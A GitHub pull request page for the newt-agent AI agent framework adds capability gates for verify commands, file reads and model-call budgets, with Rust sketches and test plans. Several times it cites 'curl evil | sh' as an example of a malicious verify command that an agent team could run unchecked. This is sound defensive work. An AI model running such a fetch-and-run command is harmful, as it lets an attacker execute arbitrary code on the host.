feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) by hartsock · Pull Request #765 · Gilamonster-Foundation/newt-agent

hartsock · 2026-06-29T15:51:11Z

OCAP enforcement-floor stack — PR 5 of 8 · epic #749

Stacked on step 4 (#760); review and merge after #760. This completes the core complete-mediation work (steps 2–5): the .meet() seam plus enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.

What this does

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with no exec check — a malicious verify (curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).
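
The gate described above can be sketched as follows. This is a minimal illustration, not the code in team.rs: `ExecScope`, `Workspace`, `install_subtask_verify`, and the exact-string matching inside `permits_exec` are assumptions made for the example; only the names `caveats.permits_exec`, `set_test_command`, and the `Only([...])` shape come from the PR text.

```rust
// Hypothetical stand-ins: the real newt-agent types are not shown on this page.

/// Which commands the exec axis allows (assumed shape).
#[derive(Debug, Clone, PartialEq)]
pub enum ExecScope {
    /// Unclamped: every command is permitted.
    All,
    /// Only these exact command strings are permitted.
    Only(Vec<String>),
}

#[derive(Debug, Clone)]
pub struct Caveats {
    pub exec: ExecScope,
}

impl Caveats {
    /// Assumption: exact-string membership. The real predicate may differ.
    pub fn permits_exec(&self, command: &str) -> bool {
        match &self.exec {
            ExecScope::All => true,
            ExecScope::Only(allowed) => allowed.iter().any(|c| c == command),
        }
    }
}

#[derive(Debug, Default)]
pub struct Workspace {
    /// `None` stands for "the workspace default check is in effect".
    pub test_command: Option<String>,
}

impl Workspace {
    pub fn set_test_command(&mut self, command: &str) {
        self.test_command = Some(command.to_string());
    }
}

/// Installs `verify` only when the exec caveat permits it.
/// On refusal nothing is installed and a note is returned for the caller to surface.
pub fn install_subtask_verify(
    caveats: &Caveats,
    workspace: &mut Workspace,
    verify: &str,
) -> Option<String> {
    if caveats.permits_exec(verify) {
        workspace.set_test_command(verify);
        None
    } else {
        Some(format!(
            "verify `{}` refused by the exec caveat; workspace default check stands",
            verify
        ))
    }
}
```

The point of checking before `set_test_command` is that a denied verify never becomes the installed test command, so there is no later code path that could run it.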

Test plan

denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760).

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check: a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed. With exec=Only([check-a]), verify check-b is NOT installed and check-a is (red on today's code, where both are installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

hartsock · 2026-06-29T23:23:08Z

Superseded by #781 — steps 3–6 collapsed onto current main after #751 merged + auto-closed the stack. Code is identical; review/merge there.

…lls, team-verify, clamp grammar (#749) (#781)

* feat(ocap): crew.rs enforces fs_read - complete mediation for reads (#752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751).

The crew CURATE stage read navigator-selected files unconditionally: a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash. With fs_read=Only([file]), the out-of-scope file is not read and the in-scope one is (red on today's code, where both are read; green after). just check green (52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): crew enforces max_calls - complete mediation for the call budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759).

The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch, matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged.
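
The two crew-side gates described in this commit message, the fs_read partition and the max_calls budget, might look roughly like the sketch below. `ReadScope`, `partition_readable`, and `run_dispatches` are hypothetical names for illustration; `CountBound::Unlimited`, `AtMost`, and `permits_one_more(used)` are named in the text, but their definitions here (in particular `used < limit`) are assumptions chosen to match the reported counts.

```rust
/// Hypothetical read scope for the fs_read axis.
#[derive(Debug, Clone, PartialEq)]
pub enum ReadScope {
    All,
    Only(Vec<String>),
}

impl ReadScope {
    /// Exact-string membership, as the commit note describes: no prefix or glob matching.
    pub fn permits(&self, path: &str) -> bool {
        match self {
            ReadScope::All => true,
            ReadScope::Only(allowed) => allowed.iter().any(|p| p == path),
        }
    }
}

/// Splits navigator-selected files into (readable, denied).
/// Only the first list would ever reach the workspace read call.
pub fn partition_readable(scope: &ReadScope, files: &[String]) -> (Vec<String>, Vec<String>) {
    files.iter().cloned().partition(|f| scope.permits(f))
}

/// Call budget (assumed definition).
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum CountBound {
    Unlimited,
    AtMost(u32),
}

impl CountBound {
    /// True when one more call is allowed after `used` calls have been made.
    pub fn permits_one_more(&self, used: u32) -> bool {
        match self {
            CountBound::Unlimited => true,
            CountBound::AtMost(limit) => used < *limit,
        }
    }
}

/// Simulates a crew loop that wants `wanted` model dispatches.
/// Returns (dispatches actually made, whether the budget stopped the loop early).
pub fn run_dispatches(bound: CountBound, wanted: u32) -> (u32, bool) {
    let mut calls_used = 0;
    for _ in 0..wanted {
        // Consult the budget before every dispatch, including the very first one.
        if !bound.permits_one_more(calls_used) {
            return (calls_used, true);
        }
        calls_used += 1;
    }
    (calls_used, false)
}
```

In this sketch a budget stop is returned as a distinct flag rather than folded into success, mirroring the commit's point that a cap-exit must never be reported as a successful run.
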
net: documented in-code. The crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code: 21 dispatches with max_calls=AtMost(3); green after: 3) + max_calls_zero_denies_even_the_navigator (red: 11; green: 0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760).

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check: a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed. With exec=Only([check-a]), verify check-b is NOT installed and check-a is (red on today's code, where both are installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): NamedPermissionPreset can clamp fs_read - clamp-grammar fix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765).

The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can.
NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp; follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default, because flipping it would break back-compat for every preset consumer).

TDD: fs_read_clamp_narrows_reads (red on today: fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com>
Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
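
The preset clamp from the #755 commit message above can be illustrated with a small sketch of the lowering step. The type names `NamedPermissionPreset`, `ScopeSpec`, `CaveatProfile`, and `to_caveat_profile` come from the text; their fields and variants here are assumptions (the `name` field in particular is hypothetical), and the serde attribute is left out so the example needs only the standard library.

```rust
/// Assumed shape of a scope specification; `All` is its default, per the commit text.
#[derive(Debug, Clone, PartialEq)]
pub enum ScopeSpec {
    All,
    Only(Vec<String>),
}

impl Default for ScopeSpec {
    fn default() -> Self {
        ScopeSpec::All
    }
}

/// Simplified preset: only the axis discussed here is modelled.
#[derive(Debug, Clone, Default)]
pub struct NamedPermissionPreset {
    /// Hypothetical field, present only to make the struct look realistic.
    pub name: String,
    /// `None` means the preset does not mention fs_read at all.
    pub fs_read: Option<ScopeSpec>,
}

/// Simplified profile that the preset lowers into.
#[derive(Debug, Clone, PartialEq)]
pub struct CaveatProfile {
    pub fs_read: ScopeSpec,
}

impl NamedPermissionPreset {
    /// Lowers the preset: an omitted fs_read falls back to `ScopeSpec::All`,
    /// while `Some(scope)` narrows reads to that scope.
    pub fn to_caveat_profile(&self) -> CaveatProfile {
        CaveatProfile {
            fs_read: self.fs_read.clone().unwrap_or_default(),
        }
    }
}
```

Making the field an `Option` is what keeps older presets unchanged in this sketch: a preset that never mentions fs_read lowers to the same `All` scope that was previously hardcoded.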

hartsock added the ocap label (Object-capability / authority-security; pending full design review) on Jun 29, 2026

hartsock closed this Jun 29, 2026

hartsock deleted the feat/ocap-5-team-verify branch June 29, 2026 23:26

hartsock wants to merge 1 commit into feat/ocap-4-crew-budget from feat/ocap-5-team-verify
